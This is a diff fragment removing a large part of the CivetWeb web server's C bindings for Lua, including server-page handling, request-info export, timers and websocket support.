-	return luaL_error(L, "invalid random() call");
-}
-
-
-/* mg.get_info */
-static int
-lsp_get_info(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int type1, type2;
-	const char *arg1;
-	double arg2;
-	int len;
-	char *buf;
-
-	if (num_args == 1) {
-		type1 = lua_type(L, 1);
-		if (type1 == LUA_TSTRING) {
-			arg1 = lua_tostring(L, 1);
-			/* Get info according to argument */
-			if (!mg_strcasecmp(arg1, "system")) {
-				/* Get system info */
-				len = mg_get_system_info(NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_system_info(buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-				return 1;
-			}
-			if (!mg_strcasecmp(arg1, "context")) {
-				/* Get context */
-				struct mg_context *ctx;
-				lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-				lua_gettable(L, LUA_REGISTRYINDEX);
-				ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-				/* Get context info for server context */
-				len = mg_get_context_info(ctx, NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_context_info(ctx, buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-				return 1;
-			}
-			if (!mg_strcasecmp(arg1, "common")) {
-				/* Get context info for NULL context */
-				len = mg_get_context_info(NULL, NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_context_info(NULL, buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-				return 1;
-			}
-			return 0;
-		}
-	}
-
-	if (num_args == 2) {
-		type1 = lua_type(L, 1);
-		type2 = lua_type(L, 2);
-		if ((type1 == LUA_TSTRING) && (type2 == LUA_TNUMBER)) {
-			arg1 = lua_tostring(L, 1);
-			arg2 = lua_tonumber(L, 2);
-
-			/* Get info according to argument */
-			if (!mg_strcasecmp(arg1, "connection")) {
-
-				/* Get context */
-				struct mg_context *ctx;
-				lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-				lua_gettable(L, LUA_REGISTRYINDEX);
-				ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-				/* Get connection info for connection idx */
-				int idx = (int)(arg2 + 0.5);
-
-				/* Lua uses 1 based index, C uses 0 based index */
-				idx--;
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-				len = mg_get_connection_info(ctx, idx, NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_connection_info(ctx, idx, buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-#else
-				(void)ctx;
-				(void)idx;
-				lua_pushstring(L, "");
-#endif
-
-				return 1;
-			}
-			return 0;
-		}
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid get_info() call");
-}
-
-
-/* mg.get_option */
-static int
-lsp_get_option(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int type1;
-	const char *arg1;
-	const char *data;
-
-	/* Get context */
-	struct mg_context *ctx;
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 0) {
-		const struct mg_option *opts = mg_get_valid_options();
-
-		if (!opts) {
-			return 0;
-		}
-
-		lua_newtable(L);
-		while (opts->name) {
-			data = mg_get_option(ctx, opts->name);
-			if (data) {
-				reg_string(L, opts->name, data);
-			}
-			opts++;
-		}
-
-		return 1;
-	}
-
-	if (num_args == 1) {
-		type1 = lua_type(L, 1);
-		if (type1 == LUA_TSTRING) {
-			arg1 = lua_tostring(L, 1);
-			/* Get option according to argument */
-			data = mg_get_option(ctx, arg1);
-			if (data) {
-				lua_pushstring(L, data);
-				return 1;
-			}
-			return 0;
-		}
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid get_option() call");
-}
-
-
-/* UUID library and function pointer */
-union {
-	void *p;
-	void (*f)(unsigned char uuid[16]);
-} pf_uuid_generate;
-
-
-/* mg.uuid */
-static int
-lsp_uuid(lua_State *L)
-{
-	union {
-		unsigned char uuid_array[16];
-		struct uuid_struct_type {
-			uint32_t data1;
-			uint16_t data2;
-			uint16_t data3;
-			uint8_t data4[8];
-		} uuid_struct;
-	} uuid;
-
-	char uuid_str[40];
-	int num_args = lua_gettop(L);
-
-	memset(&uuid, 0, sizeof(uuid));
-	memset(uuid_str, 0, sizeof(uuid_str));
-
-	if (num_args == 0) {
-
-		pf_uuid_generate.f(uuid.uuid_array);
-
-		sprintf(uuid_str,
-		        "{%08lX-%04X-%04X-%02X%02X-"
-		        "%02X%02X%02X%02X%02X%02X}",
-		        (unsigned long)uuid.uuid_struct.data1,
-		        (unsigned)uuid.uuid_struct.data2,
-		        (unsigned)uuid.uuid_struct.data3,
-		        (unsigned)uuid.uuid_struct.data4[0],
-		        (unsigned)uuid.uuid_struct.data4[1],
-		        (unsigned)uuid.uuid_struct.data4[2],
-		        (unsigned)uuid.uuid_struct.data4[3],
-		        (unsigned)uuid.uuid_struct.data4[4],
-		        (unsigned)uuid.uuid_struct.data4[5],
-		        (unsigned)uuid.uuid_struct.data4[6],
-		        (unsigned)uuid.uuid_struct.data4[7]);
-
-		lua_pushstring(L, uuid_str);
-		return 1;
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid random() call");
-}
-
-
-#ifdef USE_WEBSOCKET
-struct lua_websock_data {
-	lua_State *state;
-	char *script;
-	unsigned references;
-	struct mg_connection *conn[MAX_WORKER_THREADS];
-	pthread_mutex_t ws_mutex;
-};
-#endif
-
-
-/* mg.write for websockets */
-static int
-lwebsock_write(lua_State *L)
-{
-#ifdef USE_WEBSOCKET
-	int num_args = lua_gettop(L);
-	struct lua_websock_data *ws;
-	const char *str;
-	size_t size;
-	int opcode = -1;
-	unsigned i;
-	struct mg_connection *client = NULL;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_connlist);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ws = (struct lua_websock_data *)lua_touserdata(L, -1);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	if (num_args == 1) {
-		/* just one text: send it to all client */
-		if (lua_isstring(L, 1)) {
-			opcode = WEBSOCKET_OPCODE_TEXT;
-		}
-	} else if (num_args == 2) {
-		if (lua_isnumber(L, 1)) {
-			/* opcode number and message text */
-			opcode = (int)lua_tointeger(L, 1);
-		} else if (lua_isstring(L, 1)) {
-			/* opcode string and message text */
-			str = lua_tostring(L, 1);
-			if (!mg_strncasecmp(str, "text", 4))
-				opcode = WEBSOCKET_OPCODE_TEXT;
-			else if (!mg_strncasecmp(str, "bin", 3))
-				opcode = WEBSOCKET_OPCODE_BINARY;
-			else if (!mg_strncasecmp(str, "close", 5))
-				opcode = WEBSOCKET_OPCODE_CONNECTION_CLOSE;
-			else if (!mg_strncasecmp(str, "ping", 4))
-				opcode = WEBSOCKET_OPCODE_PING;
-			else if (!mg_strncasecmp(str, "pong", 4))
-				opcode = WEBSOCKET_OPCODE_PONG;
-			else if (!mg_strncasecmp(str, "cont", 4))
-				opcode = WEBSOCKET_OPCODE_CONTINUATION;
-		} else if (lua_isuserdata(L, 1)) {
-			/* client id and message text */
-			client = (struct mg_connection *)lua_touserdata(L, 1);
-			opcode = WEBSOCKET_OPCODE_TEXT;
-		}
-	} else if (num_args == 3) {
-		if (lua_isuserdata(L, 1)) {
-			client = (struct mg_connection *)lua_touserdata(L, 1);
-			if (lua_isnumber(L, 2)) {
-				/* client id, opcode number and message text */
-				opcode = (int)lua_tointeger(L, 2);
-			} else if (lua_isstring(L, 2)) {
-				/* client id, opcode string and message text */
-				str = lua_tostring(L, 2);
-				if (!mg_strncasecmp(str, "text", 4))
-					opcode = WEBSOCKET_OPCODE_TEXT;
-				else if (!mg_strncasecmp(str, "bin", 3))
-					opcode = WEBSOCKET_OPCODE_BINARY;
-				else if (!mg_strncasecmp(str, "close", 5))
-					opcode = WEBSOCKET_OPCODE_CONNECTION_CLOSE;
-				else if (!mg_strncasecmp(str, "ping", 4))
-					opcode = WEBSOCKET_OPCODE_PING;
-				else if (!mg_strncasecmp(str, "pong", 4))
-					opcode = WEBSOCKET_OPCODE_PONG;
-				else if (!mg_strncasecmp(str, "cont", 4))
-					opcode = WEBSOCKET_OPCODE_CONTINUATION;
-			}
-		}
-	}
-
-	if (opcode >= 0 && opcode < 16 && lua_isstring(L, num_args)) {
-		str = lua_tolstring(L, num_args, &size);
-		if (client) {
-			for (i = 0; i < ws->references; i++) {
-				if (client == ws->conn[i]) {
-					mg_lock_connection(ws->conn[i]);
-					mg_websocket_write(ws->conn[i], opcode, str, size);
-					mg_unlock_connection(ws->conn[i]);
-				}
-			}
-		} else {
-			for (i = 0; i < ws->references; i++) {
-				mg_lock_connection(ws->conn[i]);
-				mg_websocket_write(ws->conn[i], opcode, str, size);
-				mg_unlock_connection(ws->conn[i]);
-			}
-		}
-	} else {
-		(void)pthread_mutex_unlock(&(ws->ws_mutex));
-		return luaL_error(L, "invalid websocket write() call");
-	}
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-#else
-	(void)(L);           /* unused */
-#endif
-	return 0;
-}
-
-
-struct laction_arg {
-	lua_State *state;
-	const char *script;
-	pthread_mutex_t *pmutex;
-	char txt[1];
-};
-
-
-static int
-lua_action(struct laction_arg *arg)
-{
-	int err, ok;
-	struct mg_context *ctx;
-
-	(void)pthread_mutex_lock(arg->pmutex);
-
-	lua_pushlightuserdata(arg->state, (void *)&lua_regkey_ctx);
-	lua_gettable(arg->state, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(arg->state, -1);
-
-	err = luaL_loadstring(arg->state, arg->txt);
-	if (err != 0) {
-		lua_cry(fc(ctx), err, arg->state, arg->script, "timer");
-		(void)pthread_mutex_unlock(arg->pmutex);
-		mg_free(arg);
-		return 0;
-	}
-	err = lua_pcall(arg->state, 0, 1, 0);
-	if (err != 0) {
-		lua_cry(fc(ctx), err, arg->state, arg->script, "timer");
-		(void)pthread_mutex_unlock(arg->pmutex);
-		mg_free(arg);
-		return 0;
-	}
-
-	ok = lua_type(arg->state, -1);
-	if (lua_isboolean(arg->state, -1)) {
-		ok = lua_toboolean(arg->state, -1);
-	} else {
-		ok = 0;
-	}
-	lua_pop(arg->state, 1);
-
-	(void)pthread_mutex_unlock(arg->pmutex);
-
-	if (!ok) {
-		mg_free(arg);
-	}
-	return ok;
-}
-
-
-static int
-lua_action_free(struct laction_arg *arg)
-{
-	if (lua_action(arg)) {
-		mg_free(arg);
-	}
-	return 0;
-}
-
-
-static int
-lwebsocket_set_timer(lua_State *L, int is_periodic)
-{
-#if defined(USE_TIMERS) && defined(USE_WEBSOCKET)
-	int num_args = lua_gettop(L);
-	struct lua_websock_data *ws;
-	int type1, type2, ok = 0;
-	double timediff;
-	struct mg_context *ctx;
-	struct laction_arg *arg;
-	const char *txt;
-	size_t txt_len;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_connlist);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ws = (struct lua_websock_data *)lua_touserdata(L, -1);
-
-	if (num_args < 2) {
-		return luaL_error(L,
-		                  "not enough arguments for set_timer/interval() call");
-	}
-
-	type1 = lua_type(L, 1);
-	type2 = lua_type(L, 2);
-
-	if (type1 == LUA_TSTRING && type2 == LUA_TNUMBER && num_args == 2) {
-		timediff = (double)lua_tonumber(L, 2);
-		txt = lua_tostring(L, 1);
-		txt_len = strlen(txt);
-		arg = (struct laction_arg *)mg_malloc_ctx(sizeof(struct laction_arg)
-		                                              + txt_len + 10,
-		                                          ctx);
-		arg->state = L;
-		arg->script = ws->script;
-		arg->pmutex = &(ws->ws_mutex);
-		memcpy(arg->txt, "return(", 7);
-		memcpy(arg->txt + 7, txt, txt_len);
-		arg->txt[txt_len + 7] = ')';
-		arg->txt[txt_len + 8] = 0;
-		ok =
-		    (0
-		     == timer_add(ctx,
-		                  timediff,
-		                  is_periodic,
-		                  1,
-		                  (taction)(is_periodic ? lua_action : lua_action_free),
-		                  (void *)arg));
-	} else if (type1 == LUA_TFUNCTION && type2 == LUA_TNUMBER) {
-		/* TODO (mid): not implemented yet */
-		return luaL_error(L, "invalid arguments for set_timer/interval() call");
-	} else {
-		return luaL_error(L, "invalid arguments for set_timer/interval() call");
-	}
-
-	lua_pushboolean(L, ok);
-	return 1;
-
-#else
-	(void)(L);           /* unused */
-	(void)(is_periodic); /* unused */
-	return 0;
-#endif
-}
-
-
-/* mg.set_timeout for websockets */
-static int
-lwebsocket_set_timeout(lua_State *L)
-{
-	return lwebsocket_set_timer(L, 0);
-}
-
-
-/* mg.set_interval for websockets */
-static int
-lwebsocket_set_interval(lua_State *L)
-{
-	return lwebsocket_set_timer(L, 1);
-}
-
-enum {
-	LUA_ENV_TYPE_LUA_SERVER_PAGE = 0,
-	LUA_ENV_TYPE_PLAIN_LUA_PAGE = 1,
-	LUA_ENV_TYPE_LUA_WEBSOCKET = 2,
-};
-
-
-static void
-prepare_lua_request_info(struct mg_connection *conn, lua_State *L)
-{
-	const char *s;
-	int i;
-
-	/* Export mg.request_info */
-	lua_pushstring(L, "request_info");
-	lua_newtable(L);
-	reg_string(L, "request_method", conn->request_info.request_method);
-	reg_string(L, "request_uri", conn->request_info.request_uri);
-	reg_string(L, "uri", conn->request_info.local_uri);
-	reg_string(L, "http_version", conn->request_info.http_version);
-	reg_string(L, "query_string", conn->request_info.query_string);
-#if defined(MG_LEGACY_INTERFACE)
-	reg_int(L, "remote_ip", conn->request_info.remote_ip); /* remote_ip is
-	                                                          deprecated, use
-	                                                          remote_addr
-	                                                          instead */
-#endif
-	reg_string(L, "remote_addr", conn->request_info.remote_addr);
-	/* TODO (high): ip version */
-	reg_int(L, "remote_port", conn->request_info.remote_port);
-	reg_int(L, "num_headers", conn->request_info.num_headers);
-	reg_int(L, "server_port", ntohs(conn->client.lsa.sin.sin_port));
-
-	if (conn->path_info != NULL) {
-		reg_string(L, "path_info", conn->path_info);
-	}
-
-	if (conn->request_info.content_length >= 0) {
-		/* reg_int64: content_length */
-		lua_pushstring(L, "content_length");
-		lua_pushnumber(
-		    L,
-		    (lua_Number)conn->request_info
-		        .content_length); /* lua_Number may be used as 52 bit integer */
-		lua_rawset(L, -3);
-	}
-	if ((s = mg_get_header(conn, "Content-Type")) != NULL) {
-		reg_string(L, "content_type", s);
-	}
-
-	if (conn->request_info.remote_user != NULL) {
-		reg_string(L, "remote_user", conn->request_info.remote_user);
-		reg_string(L, "auth_type", "Digest");
-	}
-
-	reg_boolean(L, "https", conn->ssl != NULL);
-
-	if (conn->status_code > 0) {
-		/* Lua error handler should show the status code */
-		reg_int(L, "status", conn->status_code);
-	}
-
-	lua_pushstring(L, "http_headers");
-	lua_newtable(L);
-	for (i = 0; i < conn->request_info.num_headers; i++) {
-		reg_string(L,
-		           conn->request_info.http_headers[i].name,
-		           conn->request_info.http_headers[i].value);
-	}
-	lua_rawset(L, -3);
-
-	lua_rawset(L, -3);
-}
-
-
-static void
-civetweb_open_lua_libs(lua_State *L)
-{
-	{
-		extern void luaL_openlibs(lua_State *);
-		luaL_openlibs(L);
-	}
-
-#ifdef USE_LUA_SQLITE3
-	{
-		extern int luaopen_lsqlite3(lua_State *);
-		luaopen_lsqlite3(L);
-	}
-#endif
-#ifdef USE_LUA_LUAXML
-	{
-		extern int luaopen_LuaXML_lib(lua_State *);
-		luaopen_LuaXML_lib(L);
-	}
-#endif
-#ifdef USE_LUA_FILE_SYSTEM
-	{
-		extern int luaopen_lfs(lua_State *);
-		luaopen_lfs(L);
-	}
-#endif
-#ifdef USE_LUA_BINARY
-	{
-		/* TODO (low): Test if this could be used as a replacement for bit32.
-		 * Check again with Lua 5.3 later. */
-		extern int luaopen_binary(lua_State *);
-
-		luaL_requiref(L, "binary", luaopen_binary, 1);
-		lua_pop(L, 1);
-	}
-#endif
-}
-
-
-static void
-prepare_lua_environment(struct mg_context *ctx,
-                        struct mg_connection *conn,
-                        struct lua_websock_data *ws_conn_list,
-                        lua_State *L,
-                        const char *script_name,
-                        int lua_env_type)
-{
-	civetweb_open_lua_libs(L);
-
-#if LUA_VERSION_NUM == 502
-	/* Keep the "connect" method for compatibility,
-	 * but do not backport it to Lua 5.1.
-	 * TODO: Redesign the interface.
-	 */
-	luaL_newmetatable(L, LUASOCKET);
-	lua_pushliteral(L, "__index");
-	luaL_newlib(L, luasocket_methods);
-	lua_rawset(L, -3);
-	lua_pop(L, 1);
-	lua_register(L, "connect", lsp_connect);
-#endif
-
-	/* Store context in the registry */
-	if (ctx != NULL) {
-		lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-		lua_pushlightuserdata(L, (void *)ctx);
-		lua_settable(L, LUA_REGISTRYINDEX);
-	}
-	if (ws_conn_list != NULL) {
-		lua_pushlightuserdata(L, (void *)&lua_regkey_connlist);
-		lua_pushlightuserdata(L, (void *)ws_conn_list);
-		lua_settable(L, LUA_REGISTRYINDEX);
-	}
-
-	/* Lua server pages store the depth of mg.include, in order
-	 * to detect recursions and prevent stack overflows. */
-	if (lua_env_type == LUA_ENV_TYPE_LUA_SERVER_PAGE) {
-		struct lsp_include_history *h;
-		lua_pushlightuserdata(L, (void *)&lua_regkey_lsp_include_history);
-		h = (struct lsp_include_history *)
-		    lua_newuserdata(L, sizeof(struct lsp_include_history));
-		lua_settable(L, LUA_REGISTRYINDEX);
-		memset(h, 0, sizeof(struct lsp_include_history));
-	}
-
-	/* Register mg module */
-	lua_newtable(L);
-
-	switch (lua_env_type) {
-	case LUA_ENV_TYPE_LUA_SERVER_PAGE:
-		reg_string(L, "lua_type", "page");
-		break;
-	case LUA_ENV_TYPE_PLAIN_LUA_PAGE:
-		reg_string(L, "lua_type", "script");
-		break;
-	case LUA_ENV_TYPE_LUA_WEBSOCKET:
-		reg_string(L, "lua_type", "websocket");
-		break;
-	}
-
-	if (lua_env_type == LUA_ENV_TYPE_LUA_SERVER_PAGE
-	    || lua_env_type == LUA_ENV_TYPE_PLAIN_LUA_PAGE) {
-		reg_conn_function(L, "cry", lsp_cry, conn);
-		reg_conn_function(L, "read", lsp_read, conn);
-		reg_conn_function(L, "write", lsp_write, conn);
-		reg_conn_function(L, "keep_alive", lsp_keep_alive, conn);
-		reg_conn_function(L, "send_file", lsp_send_file, conn);
-	}
-
-	if (lua_env_type == LUA_ENV_TYPE_LUA_SERVER_PAGE) {
-		reg_conn_function(L, "include", lsp_include, conn);
-		reg_conn_function(L, "redirect", lsp_redirect, conn);
-	}
-
-	if (lua_env_type == LUA_ENV_TYPE_LUA_WEBSOCKET) {
-		reg_function(L, "write", lwebsock_write);
-#ifdef USE_TIMERS
-		reg_function(L, "set_timeout", lwebsocket_set_timeout);
-		reg_function(L, "set_interval", lwebsocket_set_interval);
-#endif
-		/* reg_conn_function(L, "send_file", lsp_send_file, conn); */
-	}
-
-	reg_function(L, "time", lsp_get_time);
-	reg_function(L, "get_var", lsp_get_var);
-	reg_function(L, "get_mime_type", lsp_get_mime_type);
-	reg_function(L, "get_cookie", lsp_get_cookie);
-	reg_function(L, "md5", lsp_md5);
-	reg_function(L, "url_encode", lsp_url_encode);
-	reg_function(L, "url_decode", lsp_url_decode);
-	reg_function(L, "base64_encode", lsp_base64_encode);
-	reg_function(L, "base64_decode", lsp_base64_decode);
-	reg_function(L, "get_response_code_text", lsp_get_response_code_text);
-	reg_function(L, "random", lsp_random);
-	reg_function(L, "get_info", lsp_get_info);
-	reg_function(L, "get_option", lsp_get_option);
-
-	if (pf_uuid_generate.f) {
-		reg_function(L, "uuid", lsp_uuid);
-	}
-
-	reg_string(L, "version", CIVETWEB_VERSION);
-
-	reg_string(L, "script_name", script_name);
-
-	if (ctx != NULL) {
-		reg_string(L, "document_root", ctx->config[DOCUMENT_ROOT]);
-		reg_string(L, "auth_domain", ctx->config[AUTHENTICATION_DOMAIN]);
-#if defined(USE_WEBSOCKET)
-		if (ctx->config[WEBSOCKET_ROOT]) {
-			reg_string(L, "websocket_root", ctx->config[WEBSOCKET_ROOT]);
-		} else {
-			reg_string(L, "websocket_root", ctx->config[DOCUMENT_ROOT]);
-		}
-#endif
-
-		if (ctx->systemName != NULL) {
-			reg_string(L, "system", ctx->systemName);
-		}
-	}
-
-	/* Export connection specific info */
-	if (conn != NULL) {
-		prepare_lua_request_info(conn, L);
-	}
-
-	lua_setglobal(L, "mg");
-
-	/* Register default mg.onerror function */
-	IGNORE_UNUSED_RESULT(
-	    luaL_dostring(L,
-	                  "mg.onerror = function(e) mg.write('\\nLua error:\\n', "
-	                  "debug.traceback(e, 1)) end"));
-
-	if (ctx != NULL) {
-		/* Preload */
-		if (ctx->config[LUA_PRELOAD_FILE] != NULL) {
-			IGNORE_UNUSED_RESULT(luaL_dofile(L, ctx->config[LUA_PRELOAD_FILE]));
-		}
-
-		if (ctx->callbacks.init_lua != NULL) {
-			ctx->callbacks.init_lua(conn, L);
-		}
-	}
-}
-
-
-static int
-lua_error_handler(lua_State *L)
-{
-	const char *error_msg = lua_isstring(L, -1) ? lua_tostring(L, -1) : "?\n";
-
-	lua_getglobal(L, "mg");
-	if (!lua_isnil(L, -1)) {
-		lua_getfield(L, -1, "write"); /* call mg.write() */
-		lua_pushstring(L, error_msg);
-		lua_pushliteral(L, "\n");
-		lua_call(L, 2, 0);
-		IGNORE_UNUSED_RESULT(
-		    luaL_dostring(L, "mg.write(debug.traceback(), '\\n')"));
-	} else {
-		printf("Lua error: [%s]\n", error_msg);
-		IGNORE_UNUSED_RESULT(
-		    luaL_dostring(L, "print(debug.traceback(), '\\n')"));
-	}
-	/* TODO(lsm, low): leave the stack balanced */
-
-	return 0;
-}
-
-
-static void *
-lua_allocator(void *ud, void *ptr, size_t osize, size_t nsize)
-{
-	(void)osize; /* not used */
-
-	if (nsize == 0) {
-		mg_free(ptr);
-		return NULL;
-	}
-	return mg_realloc_ctx(ptr, nsize, (struct mg_context *)ud);
-}
-
-
-static void
-mg_exec_lua_script(struct mg_connection *conn,
-                   const char *path,
-                   const void **exports)
-{
-	int i;
-	lua_State *L;
-
-	/* Assume the script does not support keep_alive. The script may change this
-	 * by calling mg.keep_alive(true). */
-	conn->must_close = 1;
-
-	/* Execute a plain Lua script. */
-	if (path != NULL
-	    && (L = lua_newstate(lua_allocator, (void *)(conn->ctx))) != NULL) {
-		prepare_lua_environment(
-		    conn->ctx, conn, NULL, L, path, LUA_ENV_TYPE_PLAIN_LUA_PAGE);
-		lua_pushcclosure(L, &lua_error_handler, 0);
-
-		if (exports != NULL) {
-#if LUA_VERSION_NUM > 501
-			lua_pushglobaltable(L);
-			for (i = 0; exports[i] != NULL && exports[i + 1] != NULL; i += 2) {
-				lua_CFunction func;
-				lua_pushstring(L, (const char *)(exports[i]));
-				*(const void **)(&func) = exports[i + 1];
-				lua_pushcclosure(L, func, 0);
-				lua_rawset(L, -3);
-			}
-#else
-			for (i = 0; exports[i] != NULL && exports[i + 1] != NULL; i += 2) {
-				lua_CFunction func;
-				const char *name = (const char *)(exports[i]);
-				*(const void **)(&func) = exports[i + 1];
-				lua_register(L, name, func);
-			}
-#endif
-		}
-
-		if (luaL_loadfile(L, path) != 0) {
-			lua_error_handler(L);
-		}
-		lua_pcall(L, 0, 0, -2);
-		lua_close(L);
-	}
-}
-
-
-static int
-handle_lsp_request(struct mg_connection *conn,
-                   const char *path,
-                   struct mg_file *filep,
-                   struct lua_State *ls)
-{
-	void *p = NULL;
-	lua_State *L = NULL;
-	struct lsp_include_history *include_history;
-	int error = 1;
-
-	/* Assume the script does not support keep_alive. The script may change this
-	 * by calling mg.keep_alive(true). */
-	conn->must_close = 1;
-
-	/* mg_fopen opens the file and sets the size accordingly */
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, filep)) {
-
-		/* File not found or not accessible */
-		if (ls == NULL) {
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: Cannot open script file %s",
-			                   path);
-		} else {
-			luaL_error(ls, "Cannot include [%s]: not found", path);
-		}
-
-		goto cleanup_handle_lsp_request;
-	}
-
-	/* Map file in memory (size is known). */
-	if (filep->access.membuf == NULL
-	    && (p = mmap(NULL,
-	                 (size_t)filep->stat.size,
-	                 PROT_READ,
-	                 MAP_PRIVATE,
-	                 fileno(filep->access.fp),
-	                 0)) == MAP_FAILED) {
-
-		/* mmap failed */
-		if (ls == NULL) {
-			mg_send_http_error(
-			    conn,
-			    500,
-			    "Error: Cannot open script\nFile %s can not be mapped",
-			    path);
-		} else {
-			luaL_error(ls,
-			           "mmap(%s, %zu, %d): %s",
-			           path,
-			           (size_t)filep->stat.size,
-			           fileno(filep->access.fp),
-			           strerror(errno));
-		}
-
-		goto cleanup_handle_lsp_request;
-	}
-
-	if (ls != NULL) {
-		L = ls;
-	} else {
-		L = lua_newstate(lua_allocator, (void *)(conn->ctx));
-		if (L == NULL) {
-			mg_send_http_error(
-			    conn,
-			    500,
-			    "%s",
-			    "Error: Cannot execute script\nlua_newstate failed");
-
-			goto cleanup_handle_lsp_request;
-		}
-		prepare_lua_environment(
-		    conn->ctx, conn, NULL, L, path, LUA_ENV_TYPE_LUA_SERVER_PAGE);
-	}
-
-	/* Get LSP include history table */
-	lua_pushlightuserdata(L, (void *)&lua_regkey_lsp_include_history);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	include_history = (struct lsp_include_history *)lua_touserdata(L, -1);
-
-	/* Store script name and increment depth */
-	include_history->depth++;
-	include_history->script[include_history->depth] = path;
-
-	/* Lua state is ready to use */
-	/* We're not sending HTTP headers here, Lua page must do it. */
-	error = run_lsp(conn,
-	                path,
-	                (filep->access.membuf == NULL)
-	                    ? (const char *)p
-	                    : (const char *)filep->access.membuf,
-	                filep->stat.size,
-	                L);
-
-cleanup_handle_lsp_request:
-
-	if (L != NULL && ls == NULL)
-		lua_close(L);
-	if (p != NULL)
-		munmap(p, filep->stat.size);
-	(void)mg_fclose(&filep->access);
-
-	return error;
-}
-
-
-#ifdef USE_WEBSOCKET
-struct mg_shared_lua_websocket_list {
-	struct lua_websock_data ws;
-	struct mg_shared_lua_websocket_list *next;
-};
-
-
-static void *
-lua_websocket_new(const char *script, struct mg_connection *conn)
-{
-	struct mg_shared_lua_websocket_list **shared_websock_list =
-	    &(conn->ctx->shared_lua_websockets);
-	struct lua_websock_data *ws;
-	int err, ok = 0;
-
-	assert(conn->lua_websocket_state == NULL);
-
-	/* lock list (mg_context global) */
-	mg_lock_context(conn->ctx);
-	while (*shared_websock_list) {
-		/* check if ws already in list */
-		if (0 == strcmp(script, (*shared_websock_list)->ws.script)) {
-			break;
-		}
-		shared_websock_list = &((*shared_websock_list)->next);
-	}
-
-	if (*shared_websock_list == NULL) {
-		/* add ws to list */
-		*shared_websock_list =
-		    (struct mg_shared_lua_websocket_list *)mg_calloc_ctx(
-		        sizeof(struct mg_shared_lua_websocket_list), 1, conn->ctx);
-		if (*shared_websock_list == NULL) {
-			mg_unlock_context(conn->ctx);
-			mg_cry(conn, "Cannot create shared websocket struct, OOM");
-			return NULL;
-		}
-		/* init ws list element */
-		ws = &(*shared_websock_list)->ws;
-		ws->script = mg_strdup(script); /* TODO (low): handle OOM */
-		pthread_mutex_init(&(ws->ws_mutex), &pthread_mutex_attr);
-		(void)pthread_mutex_lock(&(ws->ws_mutex));
-		ws->state = lua_newstate(lua_allocator, (void *)(conn->ctx));
-		ws->conn[0] = conn;
-		ws->references = 1;
-		prepare_lua_environment(
-		    conn->ctx, NULL, ws, ws->state, script, LUA_ENV_TYPE_LUA_WEBSOCKET);
-		err = luaL_loadfile(ws->state, script);
-		if (err != 0) {
-			lua_cry(conn, err, ws->state, script, "load");
-		}
-		err = lua_pcall(ws->state, 0, 0, 0);
-		if (err != 0) {
-			lua_cry(conn, err, ws->state, script, "init");
-		}
-	} else {
-		/* inc ref count */
-		ws = &(*shared_websock_list)->ws;
-		(void)pthread_mutex_lock(&(ws->ws_mutex));
-		(*shared_websock_list)->ws.conn[(ws->references)++] = conn;
-	}
-	mg_unlock_context(conn->ctx);
-
-	/* call add */
-	lua_getglobal(ws->state, "open");
-	lua_newtable(ws->state);
-	prepare_lua_request_info(conn, ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-
-	err = lua_pcall(ws->state, 1, 1, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, script, "open handler");
-	} else {
-		if (lua_isboolean(ws->state, -1)) {
-			ok = lua_toboolean(ws->state, -1);
-		}
-		lua_pop(ws->state, 1);
-	}
-	if (!ok) {
-		/* Remove from ws connection list. */
-		/* TODO (mid): Check if list entry and Lua state needs to be deleted
-		 * (see websocket_close). */
-		(*shared_websock_list)->ws.conn[--(ws->references)] = 0;
-	}
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-	return ok ? (void *)ws : NULL;
-}
-
-
-static int
-lua_websocket_data(struct mg_connection *conn,
-                   int bits,
-                   char *data,
-                   size_t data_len,
